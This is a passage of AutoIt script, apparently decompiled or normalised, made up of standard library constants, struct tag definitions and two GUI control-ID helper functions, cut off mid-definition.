CONST $MOUSE_CLICK_PRIMARY = "primary" GLOBAL CONST $MOUSE_CLICK_SECONDARY = "secondary" GLOBAL CONST $MOUSE_WHEEL_UP = "up" GLOBAL CONST $MOUSE_WHEEL_DOWN = "down" GLOBAL CONST $NUMBER_AUTO = 0 GLOBAL CONST $NUMBER_32BIT = 1 GLOBAL CONST $NUMBER_64BIT = 2 GLOBAL CONST $NUMBER_DOUBLE = 3 GLOBAL CONST $OBJ_NAME = 1 GLOBAL CONST $OBJ_STRING = 2 GLOBAL CONST $OBJ_PROGID = 3 GLOBAL CONST $OBJ_FILE = 4 GLOBAL CONST $OBJ_MODULE = 5 GLOBAL CONST $OBJ_CLSID = 6 GLOBAL CONST $OBJ_IID = 7 GLOBAL CONST $EXITCLOSE_NORMAL = 0 GLOBAL CONST $EXITCLOSE_BYEXIT = 1 GLOBAL CONST $EXITCLOSE_BYCLICK = 2 GLOBAL CONST $EXITCLOSE_BYLOGOFF = 3 GLOBAL CONST $EXITCLOSE_BYSHUTDOWN = 4 GLOBAL CONST $PROCESS_STATS_MEMORY = 0 GLOBAL CONST $PROCESS_STATS_IO = 1 GLOBAL CONST $PROCESS_LOW = 0 GLOBAL CONST $PROCESS_BELOWNORMAL = 1 GLOBAL CONST $PROCESS_NORMAL = 2 GLOBAL CONST $PROCESS_ABOVENORMAL = 3 GLOBAL CONST $PROCESS_HIGH = 4 GLOBAL CONST $PROCESS_REALTIME = 5 GLOBAL CONST $RUN_LOGON_NOPROFILE = 0 GLOBAL CONST $RUN_LOGON_PROFILE = 1 GLOBAL CONST $RUN_LOGON_NETWORK = 2 GLOBAL CONST $RUN_LOGON_INHERIT = 4 GLOBAL CONST $SOUND_NOWAIT = 0 GLOBAL CONST $SOUND_WAIT = 1 GLOBAL CONST $SHEX_OPEN = "open" GLOBAL CONST $SHEX_EDIT = "edit" GLOBAL CONST $SHEX_PRINT = "print" GLOBAL CONST $SHEX_PROPERTIES = "properties" GLOBAL CONST $TCP_DATA_DEFAULT = 0 GLOBAL CONST $TCP_DATA_BINARY = 1 GLOBAL CONST $UDP_OPEN_DEFAULT = 0 GLOBAL CONST $UDP_OPEN_BROADCAST = 1 GLOBAL CONST $UDP_DATA_DEFAULT = 0 GLOBAL CONST $UDP_DATA_BINARY = 1 GLOBAL CONST $UDP_DATA_ARRAY = 2 GLOBAL CONST $TIP_NOICON = 0 GLOBAL CONST $TIP_INFOICON = 1 GLOBAL CONST $TIP_WARNINGICON = 2 GLOBAL CONST $TIP_ERRORICON = 3 GLOBAL CONST $TIP_BALLOON = 1 GLOBAL CONST $TIP_CENTER = 2 GLOBAL CONST $TIP_FORCEVISIBLE = 4 GLOBAL CONST $WINDOWS_NOONTOP = 0 GLOBAL CONST $WINDOWS_ONTOP = 1 GLOBAL CONST $WIN_STATE_EXISTS = 1 GLOBAL CONST $WIN_STATE_VISIBLE = 2 GLOBAL CONST $WIN_STATE_ENABLED = 4 GLOBAL CONST $WIN_STATE_ACTIVE = 8 GLOBAL CONST $WIN_STATE_MINIMIZED = 16 GLOBAL CONST $WIN_STATE_MAXIMIZED = 32 GLOBAL CONST $_UDF_GLOBALIDS_OFFSET = 2 GLOBAL CONST $_UDF_GLOBALID_MAX_WIN = 16 GLOBAL CONST $_UDF_STARTID = 10000 GLOBAL CONST $_UDF_GLOBALID_MAX_IDS = 55535 GLOBAL CONST $__UDFGUICONSTANT_WS_TABSTOP = 65536 GLOBAL CONST $__UDFGUICONSTANT_WS_VISIBLE = 268435456 GLOBAL CONST $__UDFGUICONSTANT_WS_CHILD = 1073741824 GLOBAL $__G_AUDF_GLOBALIDS_USED [$_UDF_GLOBALID_MAX_WIN ] [$_UDF_GLOBALID_MAX_IDS + $_UDF_GLOBALIDS_OFFSET + 1 ] FUNC __UDF_GETNEXTGLOBALID ($HWND ) LOCAL $NCTRLID , $IUSEDINDEX = + 4294967295 , $BALLUSED = TRUE IF NOT WINEXISTS ($HWND ) THEN RETURN SETERROR (+ 4294967295 , + 4294967295 , 0 ) FOR $IINDEX = 0 TO $_UDF_GLOBALID_MAX_WIN + 4294967295 IF $__G_AUDF_GLOBALIDS_USED [$IINDEX ] [0 ] <> 0 THEN IF NOT WINEXISTS ($__G_AUDF_GLOBALIDS_USED [$IINDEX ] [0 ] ) THEN FOR $X = 0 TO UBOUND ($__G_AUDF_GLOBALIDS_USED , $UBOUND_COLUMNS ) + 4294967295 $__G_AUDF_GLOBALIDS_USED [$IINDEX ] [$X ] = 0 NEXT $__G_AUDF_GLOBALIDS_USED [$IINDEX ] [1 ] = $_UDF_STARTID $BALLUSED = FALSE ENDIF ENDIF NEXT FOR $IINDEX = 0 TO $_UDF_GLOBALID_MAX_WIN + 4294967295 IF $__G_AUDF_GLOBALIDS_USED [$IINDEX ] [0 ] = $HWND THEN $IUSEDINDEX = $IINDEX EXITLOOP ENDIF NEXT IF $IUSEDINDEX = + 4294967295 THEN FOR $IINDEX = 0 TO $_UDF_GLOBALID_MAX_WIN + 4294967295 IF $__G_AUDF_GLOBALIDS_USED [$IINDEX ] [0 ] = 0 THEN $__G_AUDF_GLOBALIDS_USED [$IINDEX ] [0 ] = $HWND $__G_AUDF_GLOBALIDS_USED [$IINDEX ] [1 ] = $_UDF_STARTID $BALLUSED = FALSE $IUSEDINDEX = $IINDEX EXITLOOP ENDIF NEXT ENDIF IF $IUSEDINDEX = + 4294967295 AND $BALLUSED THEN RETURN SETERROR (16 , 0 , 0 ) IF $__G_AUDF_GLOBALIDS_USED [$IUSEDINDEX ] [1 ] = $_UDF_STARTID + $_UDF_GLOBALID_MAX_IDS THEN FOR $IIDINDEX = $_UDF_GLOBALIDS_OFFSET TO UBOUND ($__G_AUDF_GLOBALIDS_USED , $UBOUND_COLUMNS ) + 4294967295 IF $__G_AUDF_GLOBALIDS_USED [$IUSEDINDEX ] [$IIDINDEX ] = 0 THEN $NCTRLID = ($IIDINDEX - $_UDF_GLOBALIDS_OFFSET ) + 10000 $__G_AUDF_GLOBALIDS_USED [$IUSEDINDEX ] [$IIDINDEX ] = $NCTRLID RETURN $NCTRLID ENDIF NEXT RETURN SETERROR (+ 4294967295 , $_UDF_GLOBALID_MAX_IDS , 0 ) ENDIF $NCTRLID = $__G_AUDF_GLOBALIDS_USED [$IUSEDINDEX ] [1 ] $__G_AUDF_GLOBALIDS_USED [$IUSEDINDEX ] [1 ] += 1 $__G_AUDF_GLOBALIDS_USED [$IUSEDINDEX ] [($NCTRLID + 4294957296 ) + $_UDF_GLOBALIDS_OFFSET ] = $NCTRLID RETURN $NCTRLID ENDFUNC FUNC __UDF_FREEGLOBALID ($HWND , $IGLOBALID ) IF $IGLOBALID - $_UDF_STARTID < 0 OR $IGLOBALID - $_UDF_STARTID > $_UDF_GLOBALID_MAX_IDS THEN RETURN SETERROR (+ 4294967295 , 0 , FALSE ) FOR $IINDEX = 0 TO $_UDF_GLOBALID_MAX_WIN + 4294967295 IF $__G_AUDF_GLOBALIDS_USED [$IINDEX ] [0 ] = $HWND THEN FOR $X = $_UDF_GLOBALIDS_OFFSET TO UBOUND ($__G_AUDF_GLOBALIDS_USED , $UBOUND_COLUMNS ) + 4294967295 IF $__G_AUDF_GLOBALIDS_USED [$IINDEX ] [$X ] = $IGLOBALID THEN $__G_AUDF_GLOBALIDS_USED [$IINDEX ] [$X ] = 0 RETURN TRUE ENDIF NEXT RETURN SETERROR (+ 4294967293 , 0 , FALSE ) ENDIF NEXT RETURN SETERROR (+ 4294967294 , 0 , FALSE ) ENDFUNC GLOBAL CONST $__DLG_WM_USER = 1024 GLOBAL CONST $BIF_BROWSEFILEJUNCTIONS = 65536 GLOBAL CONST $BIF_BROWSEFORCOMPUTER = 4096 GLOBAL CONST $BIF_BROWSEFORPRINTER = 8192 GLOBAL CONST $BIF_BROWSEINCLUDEFILES = 16384 GLOBAL CONST $BIF_BROWSEINCLUDEURLS = 128 GLOBAL CONST $BIF_DONTGOBELOWDOMAIN = 2 GLOBAL CONST $BIF_EDITBOX = 16 GLOBAL CONST $BIF_NEWDIALOGSTYLE = 64 GLOBAL CONST $BIF_NONEWFOLDERBUTTON = 512 GLOBAL CONST $BIF_NOTRANSLATETARGETS = 1024 GLOBAL CONST $BIF_RETURNFSANCESTORS = 8 GLOBAL CONST $BIF_RETURNONLYFSDIRS = 1 GLOBAL CONST $BIF_SHAREABLE = 32768 GLOBAL CONST $BIF_STATUSTEXT = 4 GLOBAL CONST $BIF_USENEWUI = BITOR ($BIF_EDITBOX , $BIF_NEWDIALOGSTYLE ) GLOBAL CONST $BIF_UAHINT = 256 GLOBAL CONST $BIF_VALIDATE = 32 GLOBAL CONST $BFFM_INITIALIZED = 1 GLOBAL CONST $BFFM_IUNKNOWN = 5 GLOBAL CONST $BFFM_SELCHANGED = 2 GLOBAL CONST $BFFM_VALIDATEFAILED = 4 GLOBAL CONST $BFFM_SETSTATUSTEXTA = $__DLG_WM_USER + 100 GLOBAL CONST $BFFM_ENABLEOK = $__DLG_WM_USER + 101 GLOBAL CONST $BFFM_SETSELECTIONA = $__DLG_WM_USER + 102 GLOBAL CONST $BFFM_SETSELECTIONW = $__DLG_WM_USER + 103 GLOBAL CONST $BFFM_SETSTATUSTEXTW = $__DLG_WM_USER + 104 GLOBAL CONST $BFFM_SETOKTEXT = $__DLG_WM_USER + 105 GLOBAL CONST $BFFM_SETEXPANDED = $__DLG_WM_USER + 106 GLOBAL CONST $CDERR_DIALOGFAILURE = 65535 GLOBAL CONST $CDERR_FINDRESFAILURE = 6 GLOBAL CONST $CDERR_INITIALIZATION = 2 GLOBAL CONST $CDERR_LOADRESFAILURE = 7 GLOBAL CONST $CDERR_LOADSTRFAILURE = 5 GLOBAL CONST $CDERR_LOCKRESFAILURE = 8 GLOBAL CONST $CDERR_MEMALLOCFAILURE = 9 GLOBAL CONST $CDERR_MEMLOCKFAILURE = 10 GLOBAL CONST $CDERR_NOHINSTANCE = 4 GLOBAL CONST $CDERR_NOHOOK = 11 GLOBAL CONST $CDERR_NOTEMPLATE = 3 GLOBAL CONST $CDERR_REGISTERMSGFAIL = 12 GLOBAL CONST $CDERR_STRUCTSIZE = 1 GLOBAL CONST $PDERR_CREATEICFAILURE = 4106 GLOBAL CONST $PDERR_DEFAULTDIFFERENT = 4108 GLOBAL CONST $PDERR_DNDMMISMATCH = 4105 GLOBAL CONST $PDERR_GETDEVMODEFAIL = 4101 GLOBAL CONST $PDERR_INITFAILURE = 4102 GLOBAL CONST $PDERR_LOADDRVFAILURE = 4100 GLOBAL CONST $PDERR_NODEFAULTPRN = 4104 GLOBAL CONST $PDERR_NODEVICES = 4103 GLOBAL CONST $PDERR_PARSEFAILURE = 4098 GLOBAL CONST $PDERR_PRINTERNOTFOUND = 4107 GLOBAL CONST $PDERR_RETDEFFAILURE = 4099 GLOBAL CONST $PDERR_SETUPFAILURE = 4097 GLOBAL CONST $CFERR_MAXLESSTHANMIN = 8194 GLOBAL CONST $CFERR_NOFONTS = 8193 GLOBAL CONST $FNERR_BUFFERTOOSMALL = 12291 GLOBAL CONST $FNERR_INVALIDFILENAME = 12290 GLOBAL CONST $FNERR_SUBCLASSFAILURE = 12289 GLOBAL CONST $FRERR_BUFFERLENGTHZERO = 16385 GLOBAL CONST $FR_DIALOGTERM = 64 GLOBAL CONST $FR_DOWN = 1 GLOBAL CONST $FR_ENABLEHOOK = 256 GLOBAL CONST $FR_ENABLETEMPLATE = 512 GLOBAL CONST $FR_ENABLETEMPLATEHANDLE = 8192 GLOBAL CONST $FR_FINDNEXT = 8 GLOBAL CONST $FR_HIDEUPDOWN = 16384 GLOBAL CONST $FR_HIDEMATCHCASE = 32768 GLOBAL CONST $FR_HIDEWHOLEWORD = 65536 GLOBAL CONST $FR_MATCHCASE = 4 GLOBAL CONST $FR_NOMATCHCASE = 2048 GLOBAL CONST $FR_NOUPDOWN = 1024 GLOBAL CONST $FR_NOWHOLEWORD = 4096 GLOBAL CONST $FR_REPLACE = 16 GLOBAL CONST $FR_REPLACEALL = 32 GLOBAL CONST $FR_SHOWHELP = 128 GLOBAL CONST $FR_WHOLEWORD = 2 GLOBAL CONST $SHFMT_ID_DEFAULT = 65535 GLOBAL CONST $SHFMT_OPT_FULL = 0 GLOBAL CONST $SHFMT_OPT_QUICKFORMAT = 1 GLOBAL CONST $SHFMT_OPT_SYSONLY = 2 GLOBAL CONST $SHFMT_ERROR = + 4294967295 GLOBAL CONST $SHFMT_CANCEL = + 4294967294 GLOBAL CONST $SHFMT_NOFORMAT = + 4294967293 GLOBAL CONST $CDM_FIRST = $__DLG_WM_USER + 100 GLOBAL CONST $CDM_GETSPEC = $CDM_FIRST GLOBAL CONST $CDM_GETFILEPATH = $CDM_FIRST + 1 GLOBAL CONST $CDM_GETFOLDERPATH = $CDM_FIRST + 2 GLOBAL CONST $CDM_GETFOLDERIDLIST = $CDM_FIRST + 3 GLOBAL CONST $CDM_SETCONTROLTEXT = $CDM_FIRST + 4 GLOBAL CONST $CDM_HIDECONTROL = $CDM_FIRST + 5 GLOBAL CONST $CDM_SETDEFEXT = $CDM_FIRST + 6 GLOBAL CONST $CDM_LAST = $__DLG_WM_USER + 200 GLOBAL CONST $CDN_FIRST = + 4294966695 GLOBAL CONST $CDN_INITDONE = $CDN_FIRST GLOBAL CONST $CDN_SELCHANGE = $CDN_FIRST + 4294967295 GLOBAL CONST $CDN_FOLDERCHANGE = $CDN_FIRST + 4294967294 GLOBAL CONST $CDN_SHAREVIOLATION = $CDN_FIRST + 4294967293 GLOBAL CONST $CDN_HELP = $CDN_FIRST + 4294967292 GLOBAL CONST $CDN_FILEOK = $CDN_FIRST + 4294967291 GLOBAL CONST $CDN_TYPECHANGE = $CDN_FIRST + 4294967290 GLOBAL CONST $CDN_INCLUDEITEM = $CDN_FIRST + 4294967289 GLOBAL CONST $CDN_LAST = + 4294966597 GLOBAL CONST $PSD_DEFAULTMINMARGINS = 0 GLOBAL CONST $PSD_DISABLEMARGINS = 16 GLOBAL CONST $PSD_DISABLEORIENTATION = 256 GLOBAL CONST $PSD_DISABLEPAGEPAINTING = 524288 GLOBAL CONST $PSD_DISABLEPAPER = 512 GLOBAL CONST $PSD_DISABLEPRINTER = 32 GLOBAL CONST $PSD_ENABLEPAGEPAINTHOOK = 262144 GLOBAL CONST $PSD_ENABLEPAGESETUPHOOK = 8192 GLOBAL CONST $PSD_ENABLEPAGESETUPTEMPLATE = 32768 GLOBAL CONST $PSD_ENABLEPAGESETUPTEMPLATEHANDLE = 131072 GLOBAL CONST $PSD_INHUNDREDTHSOFMILLIMETERS = 8 GLOBAL CONST $PSD_INTHOUSANDTHSOFINCHES = 4 GLOBAL CONST $PSD_MARGINS = 2 GLOBAL CONST $PSD_MINMARGINS = 1 GLOBAL CONST $PSD_NONETWORKBUTTON = 2097152 GLOBAL CONST $PSD_NOWARNING = 128 GLOBAL CONST $PSD_RETURNDEFAULT = 1024 GLOBAL CONST $PSD_SHOWHELP = 2048 GLOBAL CONST $WM_PSD_PAGESETUPDLG = $__DLG_WM_USER GLOBAL CONST $WM_PSD_FULLPAGERECT = $__DLG_WM_USER + 1 GLOBAL CONST $WM_PSD_MINMARGINRECT = $__DLG_WM_USER + 2 GLOBAL CONST $WM_PSD_MARGINRECT = $__DLG_WM_USER + 3 GLOBAL CONST $WM_PSD_GREEKTEXTRECT = $__DLG_WM_USER + 4 GLOBAL CONST $WM_PSD_ENVSTAMPRECT = $__DLG_WM_USER + 5 GLOBAL CONST $WM_PSD_YAFULLPAGERECT = $__DLG_WM_USER + 6 GLOBAL CONST $PD_ALLPAGES = 0 GLOBAL CONST $PD_COLLATE = 16 GLOBAL CONST $PD_CURRENTPAGE = 4194304 GLOBAL CONST $PD_DISABLEPRINTTOFILE = 524288 GLOBAL CONST $PD_ENABLEPRINTHOOK = 4096 GLOBAL CONST $PD_ENABLEPRINTTEMPLATE = 16384 GLOBAL CONST $PD_ENABLEPRINTTEMPLATEHANDLE = 65536 GLOBAL CONST $PD_ENABLESETUPHOOK = 8192 GLOBAL CONST $PD_ENABLESETUPTEMPLATE = 32768 GLOBAL CONST $PD_ENABLESETUPTEMPLATEHANDLE = 131072 GLOBAL CONST $PD_EXCLUSIONFLAGS = 16777216 GLOBAL CONST $PD_HIDEPRINTTOFILE = 1048576 GLOBAL CONST $PD_NOCURRENTPAGE = 8388608 GLOBAL CONST $PD_NONETWORKBUTTON = 2097152 GLOBAL CONST $PD_NOPAGENUMS = 8 GLOBAL CONST $PD_NOSELECTION = 4 GLOBAL CONST $PD_NOWARNING = 128 GLOBAL CONST $PD_PAGENUMS = 2 GLOBAL CONST $PD_PRINTSETUP = 64 GLOBAL CONST $PD_PRINTTOFILE = 32 GLOBAL CONST $PD_RETURNDC = 256 GLOBAL CONST $PD_RETURNDEFAULT = 1024 GLOBAL CONST $PD_RETURNIC = 512 GLOBAL CONST $PD_SELECTION = 1 GLOBAL CONST $PD_SHOWHELP = 2048 GLOBAL CONST $PD_USEDEVMODECOPIES = 262144 GLOBAL CONST $PD_USEDEVMODECOPIESANDCOLLATE = $PD_USEDEVMODECOPIES GLOBAL CONST $PD_USELARGETEMPLATE = 268435456 GLOBAL CONST $PD_RESULT_APPLY = 2 GLOBAL CONST $PD_RESULT_CANCEL = 0 GLOBAL CONST $PD_RESULT_PRINT = 1 GLOBAL CONST $EWX_LOGOFF = 0 GLOBAL CONST $EWX_POWEROFF = 8 GLOBAL CONST $EWX_REBOOT = 2 GLOBAL CONST $EWX_SHUTDOWN = 1 GLOBAL CONST $EWX_FORCE = 4 GLOBAL CONST $EWX_FORCEIFHUNG = 16 GLOBAL CONST $OAIF_ALLOW_REGISTRATION = 1 GLOBAL CONST $OAIF_REGISTER_EXT = 2 GLOBAL CONST $OAIF_EXEC = 4 GLOBAL CONST $OAIF_FORCE_REGISTRATION = 8 GLOBAL CONST $OAIF_HIDE_REGISTRATION = 32 GLOBAL CONST $OAIF_URL_PROTOCOL = 64 GLOBAL CONST $CREDUI_FLAGS_ALWAYS_SHOW_UI = 128 GLOBAL CONST $CREDUI_FLAGS_COMPLETE_USERNAME = 2048 GLOBAL CONST $CREDUI_FLAGS_DO_NOT_PERSIST = 2 GLOBAL CONST $CREDUI_FLAGS_EXCLUDE_CERTIFICATES = 8 GLOBAL CONST $CREDUI_FLAGS_EXPECT_CONFIRMATION = 131072 GLOBAL CONST $CREDUI_FLAGS_GENERIC_CREDENTIALS = 262144 GLOBAL CONST $CREDUI_FLAGS_INCORRECT_PASSWORD = 1 GLOBAL CONST $CREDUI_FLAGS_KEEP_USERNAME = 1048576 GLOBAL CONST $CREDUI_FLAGS_PASSWORD_ONLY_OK = 512 GLOBAL CONST $CREDUI_FLAGS_PERSIST = 4096 GLOBAL CONST $CREDUI_FLAGS_REQUEST_ADMINISTRATOR = 4 GLOBAL CONST $CREDUI_FLAGS_REQUIRE_CERTIFICATE = 16 GLOBAL CONST $CREDUI_FLAGS_REQUIRE_SMARTCARD = 256 GLOBAL CONST $CREDUI_FLAGS_SERVER_CREDENTIAL = 16384 GLOBAL CONST $CREDUI_FLAGS_SHOW_SAVE_CHECK_BOX = 64 GLOBAL CONST $CREDUI_FLAGS_USERNAME_TARGET_CREDENTIALS = 524288 GLOBAL CONST $CREDUI_FLAGS_VALIDATE_USERNAME = 1024 GLOBAL CONST $CREDUIWIN_AUTHPACKAGE_ONLY = 16 GLOBAL CONST $CREDUIWIN_CHECKBOX = 2 GLOBAL CONST $CREDUIWIN_ENUMERATE_ADMINS = 256 GLOBAL CONST $CREDUIWIN_ENUMERATE_CURRENT_USER = 512 GLOBAL CONST $CREDUIWIN_GENERIC = 1 GLOBAL CONST $CREDUIWIN_IN_CRED_ONLY = 32 GLOBAL CONST $CREDUIWIN_SECURE_PROMPT = 4096 GLOBAL CONST $CREDUIWIN_PACK_32_WOW = 268435456 GLOBAL CONST $CREDUIWIN_PREPROMPTING = 8192 GLOBAL CONST $STR_NOCASESENSE = 0 GLOBAL CONST $STR_CASESENSE = 1 GLOBAL CONST $STR_NOCASESENSEBASIC = 2 GLOBAL CONST $STR_STRIPLEADING = 1 GLOBAL CONST $STR_STRIPTRAILING = 2 GLOBAL CONST $STR_STRIPSPACES = 4 GLOBAL CONST $STR_STRIPALL = 8 GLOBAL CONST $STR_CHRSPLIT = 0 GLOBAL CONST $STR_ENTIRESPLIT = 1 GLOBAL CONST $STR_NOCOUNT = 2 GLOBAL CONST $STR_REGEXPMATCH = 0 GLOBAL CONST $STR_REGEXPARRAYMATCH = 1 GLOBAL CONST $STR_REGEXPARRAYFULLMATCH = 2 GLOBAL CONST $STR_REGEXPARRAYGLOBALMATCH = 3 GLOBAL CONST $STR_REGEXPARRAYGLOBALFULLMATCH = 4 GLOBAL CONST $STR_ENDISSTART = 0 GLOBAL CONST $STR_ENDNOTSTART = 1 GLOBAL CONST $SB_ANSI = 1 GLOBAL CONST $SB_UTF16LE = 2 GLOBAL CONST $SB_UTF16BE = 3 GLOBAL CONST $SB_UTF8 = 4 GLOBAL CONST $SE_UTF16 = 0 GLOBAL CONST $SE_ANSI = 1 GLOBAL CONST $SE_UTF8 = 2 GLOBAL CONST $STR_UTF16 = 0 GLOBAL CONST $STR_UCS2 = 1 GLOBAL CONST $TAGPOINT = "struct;long X;long Y;endstruct" GLOBAL CONST $TAGRECT = "struct;long Left;long Top;long Right;long Bottom;endstruct" GLOBAL CONST $TAGSIZE = "struct;long X;long Y;endstruct" GLOBAL CONST $TAGMARGINS = "int cxLeftWidth;int cxRightWidth;int cyTopHeight;int cyBottomHeight" GLOBAL CONST $TAGFILETIME = "struct;dword Lo;dword Hi;endstruct" GLOBAL CONST $TAGSYSTEMTIME = "struct;word Year;word Month;word Dow;word Day;word Hour;word Minute;word Second;word MSeconds;endstruct" GLOBAL CONST $TAGTIME_ZONE_INFORMATION = "struct;long Bias;wchar StdName[32];word StdDate[8];long StdBias;wchar DayName[32];word DayDate[8];long DayBias;endstruct" GLOBAL CONST $TAGNMHDR = "struct;hwnd hWndFrom;uint_ptr IDFrom;INT Code;endstruct" GLOBAL CONST $TAGCOMBOBOXEXITEM = "uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;int SelectedImage;int OverlayImage;" & "int Indent;lparam Param" GLOBAL CONST $TAGNMCBEDRAGBEGIN = $TAGNMHDR & ";int ItemID;wchar szText[260]" GLOBAL CONST $TAGNMCBEENDEDIT = $TAGNMHDR & ";bool fChanged;int NewSelection;wchar szText[260];int Why" GLOBAL CONST $TAGNMCOMBOBOXEX = $TAGNMHDR & ";uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;" & "int SelectedImage;int OverlayImage;int Indent;lparam Param" GLOBAL CONST $TAGDTPRANGE = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;" & "word MinSecond;word MinMSecond;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;" & "word MaxMinute;word MaxSecond;word MaxMSecond;bool MinValid;bool MaxValid" GLOBAL CONST $TAGNMDATETIMECHANGE = $TAGNMHDR & ";dword Flag;" & $TAGSYSTEMTIME GLOBAL CONST $TAGNMDATETIMEFORMAT = $TAGNMHDR & ";ptr Format;" & $TAGSYSTEMTIME & ";ptr pDisplay;wchar Display[64]" GLOBAL CONST $TAGNMDATETIMEFORMATQUERY = $TAGNMHDR & ";ptr Format;struct;long SizeX;long SizeY;endstruct" GLOBAL CONST $TAGNMDATETIMEKEYDOWN = $TAGNMHDR & ";int VirtKey;ptr Format;" & $TAGSYSTEMTIME GLOBAL CONST $TAGNMDATETIMESTRING = $TAGNMHDR & ";ptr UserString;" & $TAGSYSTEMTIME & ";dword Flags" GLOBAL CONST $TAGEVENTLOGRECORD = "dword Length;dword Reserved;dword RecordNumber;dword TimeGenerated;dword TimeWritten;dword EventID;" & "word EventType;word NumStrings;word EventCategory;word ReservedFlags;dword ClosingRecordNumber;dword StringOffset;" & "dword UserSidLength;dword UserSidOffset;dword DataLength;dword DataOffset" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_BLUR = "float Radius; bool ExpandEdge" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_BRIGHTNESSCONTRAST = "int BrightnessLevel; int ContrastLevel" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_COLORBALANCE = "int CyanRed; int MagentaGreen; int YellowBlue" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_COLORCURVE = "int Adjustment; int Channel; int AdjustValue" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_COLORLUT = "byte LutB[256]; byte LutG[256]; byte LutR[256]; byte LutA[256]" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_HUESATURATIONLIGHTNESS = "int HueLevel; int SaturationLevel; int LightnessLevel" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_LEVELS = "int Highlight; int Midtone; int Shadow" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_REDEYECORRECTION = "uint NumberOfAreas; ptr Areas" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_SHARPEN = "float Radius; float Amount" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_TINT = "int Hue; int Amount" GLOBAL CONST $TAGGDIPBITMAPDATA = "uint Width;uint Height;int Stride;int Format;ptr Scan0;uint_ptr Reserved" GLOBAL CONST $TAGGDIPCOLORMATRIX = "float m[25]" GLOBAL CONST $TAGGDIPENCODERPARAM = "struct;byte GUID[16];ulong NumberOfValues;ulong Type;ptr Values;endstruct" GLOBAL CONST $TAGGDIPENCODERPARAMS = "uint Count;" & $TAGGDIPENCODERPARAM GLOBAL CONST $TAGGDIPRECTF = "struct;float X;float Y;float Width;float Height;endstruct" GLOBAL CONST $TAGGDIPSTARTUPINPUT = "uint Version;ptr Callback;bool NoThread;bool NoCodecs" GLOBAL CONST $TAGGDIPSTARTUPOUTPUT = "ptr HookProc;ptr UnhookProc" GLOBAL CONST $TAGGDIPIMAGECODECINFO = "byte CLSID[16];byte FormatID[16];ptr CodecName;ptr DllName;ptr FormatDesc;ptr FileExt;" & "ptr MimeType;dword Flags;dword Version;dword SigCount;dword SigSize;ptr SigPattern;ptr SigMask" GLOBAL CONST $TAGGDIPPENCODERPARAMS = "uint Count;byte Params[1]" GLOBAL CONST $TAGHDITEM = "uint Mask;int XY;ptr Text;handle hBMP;int TextMax;int Fmt;lparam Param;int Image;int Order;uint Type;ptr pFilter;uint State" GLOBAL CONST $TAGNMHDDISPINFO = $TAGNMHDR & ";int Item;uint Mask;ptr Text;int TextMax;int Image;lparam lParam" GLOBAL CONST $TAGNMHDFILTERBTNCLICK = $TAGNMHDR & ";int Item;" & $TAGRECT GLOBAL CONST $TAGNMHEADER = $TAGNMHDR & ";int Item;int Button;ptr pItem" GLOBAL CONST $TAGGETIPADDRESS = "byte Field4;byte Field3;byte Field2;byte Field1" GLOBAL CONST $TAGNMIPADDRESS = $TAGNMHDR & ";int Field;int Value" GLOBAL CONST $TAGLVFINDINFO = "struct;uint Flags;ptr Text;lparam Param;" & $TAGPOINT & ";uint Direction;endstruct" GLOBAL CONST $TAGLVHITTESTINFO = $TAGPOINT & ";uint Flags;int Item;int SubItem;int iGroup" GLOBAL CONST $TAGLVITEM = "struct;uint Mask;int Item;int SubItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;lparam Param;" & "int Indent;int GroupID;uint Columns;ptr pColumns;ptr piColFmt;int iGroup;endstruct" GLOBAL CONST $TAGNMLISTVIEW = $TAGNMHDR & ";int Item;int SubItem;uint NewState;uint OldState;uint Changed;" & "struct;long ActionX;long ActionY;endstruct;lparam Param" GLOBAL CONST $TAGNMLVCUSTOMDRAW = "struct;" & $TAGNMHDR & ";dword dwDrawStage;handle hdc;" & $TAGRECT & ";dword_ptr dwItemSpec;uint uItemState;lparam lItemlParam;endstruct" & ";dword clrText;dword clrTextBk;int iSubItem;dword dwItemType;dword clrFace;int iIconEffect;" & "int iIconPhase;int iPartID;int iStateID;struct;long TextLeft;long TextTop;long TextRight;long TextBottom;endstruct;uint uAlign" GLOBAL CONST $TAGNMLVDISPINFO = $TAGNMHDR & ";" & $TAGLVITEM GLOBAL CONST $TAGNMLVFINDITEM = $TAGNMHDR & ";int Start;" & $TAGLVFINDINFO GLOBAL CONST $TAGNMLVGETINFOTIP = $TAGNMHDR & ";dword Flags;ptr Text;int TextMax;int Item;int SubItem;lparam lParam" GLOBAL CONST $TAGNMITEMACTIVATE = $TAGNMHDR & ";int Index;int SubItem;uint NewState;uint OldState;uint Changed;" & $TAGPOINT & ";lparam lParam;uint KeyFlags" GLOBAL CONST $TAGNMLVKEYDOWN = "align 1;" & $TAGNMHDR & ";word VKey;uint Flags" GLOBAL CONST $TAGNMLVSCROLL = $TAGNMHDR & ";int DX;int DY" GLOBAL CONST $TAGMCHITTESTINFO = "uint Size;" & $TAGPOINT & ";uint Hit;" & $TAGSYSTEMTIME & ";" & $TAGRECT & ";int iOffset;int iRow;int iCol" GLOBAL CONST $TAGMCMONTHRANGE = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short Span" GLOBAL CONST $TAGMCRANGE = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short MinSet;short MaxSet" GLOBAL CONST $TAGMCSELRANGE = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word 